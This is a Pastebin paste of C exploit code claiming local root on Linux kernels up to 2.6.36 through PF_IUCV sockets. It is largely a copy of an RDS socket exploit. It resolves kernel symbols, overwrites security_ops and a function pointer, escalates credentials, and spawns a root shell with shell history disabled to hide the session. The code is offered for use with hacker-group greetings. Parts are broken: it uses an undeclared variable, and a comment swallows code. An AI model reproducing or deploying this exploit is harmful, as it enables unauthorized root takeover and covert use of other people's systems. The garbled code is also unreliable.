Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * Linux Kernel <= 2.6.36 PF_IUCV privilege escalation exploit
- * thanks to BCM/ROSe and other bs socket exploits :) -xd
- * Greetz: #Haqnet @ efnet , paralox.org and many other frinds who help make my world fun!
- */
- #include <stdio.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <fcntl.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <errno.h>
- #include <string.h>
- #include <sys/ptrace.h>
- #include <sys/utsname.h>
- #define RECVPORT 12000
- #define SENDPORT 12001
- /* define sycalls for the lame boxes */
- #define PF_IUCV AF_IUCV
- #define AF_IUCV 32
- int prep_sock(int port) {
- int s, ret;
- struct sockaddr_in addr;
- s = socket(PF_IUCV, SOCK_SEQPACKET, 0);
- if(s < 0) {
- printf("[*] Could not open socket.\n");
- exit(-1);
- }
- memset(&addr, 0, sizeof(addr));
- addr.sin_addr.s_addr = inet_addr("127.0.0.1");
- addr.sin_family = PF_IUCV; //AF_INET;
- addr.sin_port = htons(port);
- ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));
- if(ret < 0) {
- printf("[*] Could not bind socket.\n");
- exit(-1);
- }
- return s;
- }
- void get_message(unsigned long address, int sock) {
- recvfrom(sock, (void *)address, sizeof(void *), 0,NULL, NULL);
- }
- void send_message(unsigned long value, int sock) {
- int size, ret;
- struct sockaddr_in recvaddr;
- struct msghdr msg;
- struct iovec iov;
- unsigned long buf;
- memset(&recvaddr, 0, sizeof(recvaddr));
- size = sizeof(recvaddr);
- recvaddr.sin_port = htons(RECVPORT);
- recvaddr.sin_family = AF_IUCV; // AF_INET; could maybe be used but lets be safe and send over a PROPEr crafted packet eh?
- recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");
- memset(&msg, 0, sizeof(msg));
- msg.msg_name = &recvaddr;
- msg.msg_namelen = sizeof(recvaddr);
- msg.msg_iovlen = 1;
- buf = value;
- iov.iov_len = sizeof(buf);
- iov.iov_base = &buf;
- msg.msg_iov = &iov;
- ret = sendmsg(sock, &msg, 0);
- if(ret < 0) {
- printf("[*] Something went wrong sending.\n");
- exit(-1);
- }
- }
- void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock) {
- if(!fork()) {
- sleep(1);
- send_message(value, sendsock);
- exit(1);
- } else {
- get_message(addr, recvsock);
- wait(NULL);
- }
- }
- typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
- typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
- _commit_creds commit_creds;
- _prepare_kernel_cred prepare_kernel_cred;
- int __attribute__((regparm(3)))
- getroot(void * file, void * vma) {
- commit_creds(prepare_kernel_cred(0));
- return -1;
- }
- unsigned long get_kernel_sym(char *name) {
- FILE *f;
- unsigned long addr;
- char dummy;
- char sname[512];
- struct utsname ver;
- int ret;
- int rep = 0;
- int oldstyle = 0;
- f = fopen("/proc/kallsyms", "r");
- if (f == NULL) {
- f = fopen("/proc/ksyms", "r");
- if (f == NULL)
- goto fallback;
- oldstyle = 1;
- }
- repeat:
- ret = 0;
- while(ret != EOF) {
- if (!oldstyle)
- ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
- else {
- ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
- if (ret == 2) {
- char *p;
- if (strstr(sname, "_O/") || strstr(sname, "_S."))
- continue;
- p = strrchr(sname, '_');
- if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
- p = p - 4;
- while (p > (char *)sname && *(p - 1) == '_')
- p--;
- *p = '\0';
- }
- }
- }
- if (ret == 0) {
- fscanf(f, "%s\n", sname);
- continue;
- }
- if (!strcmp(name, sname)) {
- fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
- fclose(f);
- return addr;
- }
- }
- fclose(f);
- if (rep)
- return 0;
- fallback:
- uname(&ver);
- if (strncmp(ver.release, "2.6", 3))
- oldstyle = 1;
- sprintf(sname, "/boot/System.map-%s", ver.release);
- f = fopen(sname, "r");
- if (f == NULL)
- return 0;
- rep = 1;
- goto repeat;
- }
- int main(int argc, char * argv[]) {
- unsigned long sec_ops, def_ops, cap_ptrace, target;
- int sendsock, recvsock;
- struct utsname ver;
- printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
- uname(&ver);
- if(strncmp(ver.release, "2.6.3", 5)) {
- printf("[*] Your kernel is not vulnerable.\n");
- return -1;
- }
- printf("[*] Resolving kernel addresses..\n");
- sec_ops = get_kernel_sym("security_ops");
- def_ops = get_kernel_sym("default_security_ops");
- cap_ptrace = get_kernel_sym("cap_ptrace_traceme");
- commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
- prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
- if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {
- printf("[*] Failed to resolve kernel symbols.\n");
- return -1;
- }
- target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));
- sendsock = prep_sock(SENDPORT);
- recvsock = prep_sock(RECVPORT);
- printf("[*] Overwriting security ops...\n");
- write_to_mem(sec_ops, def_ops, sendsock, recvsock);
- printf("[*] Overwriting function pointer...\n");
- write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);
- printf("[*] Triggering payload...\n");
- ptrace(PTRACE_TRACEME, 1, NULL, NULL);
- printf("[*] Restoring function pointer...\n");
- write_to_mem(target, cap_ptrace, sendsock, recvsock);
- if(getuid()) {
- printf("[*] Exploit failed to get root.\n");
- return -1;
- } // ok here you can do wtf ya want...change it how ya like..enjoy! -xd
- else {
- printf("[+] Launching rocket!\n");
- setresuid(0, 0, 0);
- setresgid(0, 0, 0);
- if(getuid() == 0) {
- pid_t pid;
- pid = fork();
- if(pid == 0) {
- char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTSIZE=0", // thx tropic"PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
- execve("/bin/sh","/bin/sh", args, envp);
- printf("[*] Got root!\n");
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement